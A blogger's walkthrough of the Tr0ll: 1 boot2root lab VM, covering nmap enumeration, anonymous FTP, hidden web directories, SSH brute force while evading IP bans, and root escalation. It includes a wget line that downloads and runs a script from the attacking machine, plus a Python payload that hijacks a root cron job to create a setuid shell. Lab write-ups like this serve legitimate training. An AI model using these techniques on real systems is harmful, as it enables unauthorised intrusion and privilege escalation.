Coffee Difficulty Rating:

I thought I’d have a go at a Boot2Root over Christmas, looking through the VM’s I came accross Tr0ll: 1 the description caught my attention:

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead! Difficulty: Beginner ; Type: boot2root

I downloaded the VM, span it up in VMWare and got cracking.

##Enumeration

nmap -p 1-65535 -sV -sS -A -T4 192.168.78.140

root:~# nmap -p 1-65535 -sV -sS -A -T4 192.168.78.140


Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-24 18:26 GMT
Nmap scan report for 192.168.78.140
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 23:43 lol.pcap [NSE: writeable]
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_ 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=12/24%Time=549B054B%P=x86_64-unknown-linux-gnu%
SF:r(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 00:0C:29:D9:C1:FE (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 192.168.78.140

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
</p>

###Service Enumeration

Port Service Version Detection

TCP: 21

FTP

vsftpd 3.0.2

TCP: 22

SSH

protocol 2.0

TCP: 80

HTTP

Apache httpd 2.4.7 ((Ubuntu))

###FTP Enumeration

Nmap discovered anonymous FTP was exposed on the target, I downloaded lol.pcap from ftp root:

ftp lol.pcap from target

root:~# ftp 192.168.78.140


Connected to 192.168.78.140
220 (vsFTPd 3.0.2)
Name (192.168.78.140:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
8068 bytes received in 0.00 secs (1614.9 kB/s)
ftp> exit
221 Goodbye.
</p>

Examined the contents of lol.pcap in Wireshark, discovering the following message:

tr0ll lol.pcap

For clarity the message read:

FTP Data (Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P Sucks, you were so close… gotta TRY HARDER!

Checking for exposed serives in the previous Nmap scan we can see FTP, SSH and HTTP are exposed.

A quick attempt at logging in over SSH with root with the password “sup3rs3cr3tdirlol” - resulted in a fail (as expected).

Onto the next service in the list.

###HTTP Enumeration

nmap --script=http-enum -p80 -n 192.168.78.140

root:~# nmap --script=http-enum -p80 -n 192.168.78.140


Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-24 18:40 GMT
Nmap scan report for 192.168.78.140
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
MAC Address: 00:0C:29:D9:C1:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
</p>

Entering /secret/ url in the browser rendered:

tr0ll U MAD BRO

Nothing exciting was in the page source…

I took a guess and entered sup3rs3cr3tdirlol as a dir:

tr0ll sup3rs3cr3tdirlol

Lucked in! But it didn’t contain this:

tr0ll Pass.txt

strings output for “roflmao”:

strings ~/Downloads/roflmao

root:~# strings ~/Downloads/roflmao


lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"
</p>

The binary appeared to just print “0x0856BF”, I entered this in the browser again - not expecting it to work.

tr0ll which on lol

I lucked in again!

Another dir contained:

tr0ll Pass.txt

Containing:

Good_job_:)

##SSH Brute Force

I manually attempted a SSH brute force using the previously discovered usernames + password from Pass.txt. After several attempts the connection was refused via SSH, rebooting the target VM did not help - I suspected iptables, fail2ban / DenyHosts.

Changing the attacking machines IP address allowed me to reconnect, none of the usernames authenticated with the password in Pass.txt.

Picard Puff

Not sure what to do next, I tried the file name as the password against the previous list (annoyingly I had to change the target machines IP address again to complete).

Remote Exploit

Success, I managed to authenticate using:

Username Password

overflow

Pass.txt

ssh [email protected]

root:~# ssh [email protected]


Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

* Documentation: https://help.ubuntu.com/

The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

Last login: Wed Dec 24 12:00:52 2014 from 192.168.78.128
Could not chdir to home directory /home/overflow: No such file or directory

$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
</p>

Then almost as soon as I’d logged in, the following message printed to console and the session closed:

Broadcast Message from [email protected]


Broadcast Message from [email protected]
       (somewhere) at 22:00 ...

TIMES UP LOL!

This became rather annoying…

Janeway Annoyed

Local Enumeration

I copied over my local enumeration sctipt to /var/tmp/ which discovered the following world writable files:

Local Enumeration Sctipt

root:~# wget http://attacking-machine/exploits/enumeration/lin/linux-local-enum.sh -P /var/tmp/ && chmod 700 /var/tmp/linux-local-enum.sh && ./var/tmp/linux-local-enum.sh

Weak Filesystem Permissions

The enumeration script identified the following world writable files:

#########################################
## 777 Files                           ##
#########################################

/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/lib/log/cleaner.py

Enumeration Findings

/lib/log/cleaner.py was owned by root and executed by cron to clean out /tmp

Local Privilege Escalation

From the attacking machine I downloaded an suid bin (spawns a shell) to /usr/bin/suid on the target.

Exploiting the poor filesystem permissions, I swapped out the contents of /lib/log/cleaner.py for:

#!/usr/bin/env python
import os
import sys
try:
    os.system('chown root:root /var/tmp/suid; chmod 4777 /var/tmp/suid')
except:
    sys.exit()

Got Root

Went to get a coffee, came back and reconnected after the annoying message.

Executed my suid binary, got root.

Local Privilege Escalation

root:~# /var/tmp/suid

root:~# cat /root/proof.txt

Good job, you did it!

702a8c18d29c6f3ca0d99ef5712bfbdc


root:~# id

uid=0(root) gid=0(root) groups=0(root),1002(overflow)

root:~# whoami

root

####Root dance…

Picard Dancing

##Thanks

Thanks to @maleus21 for creating this VM challenege.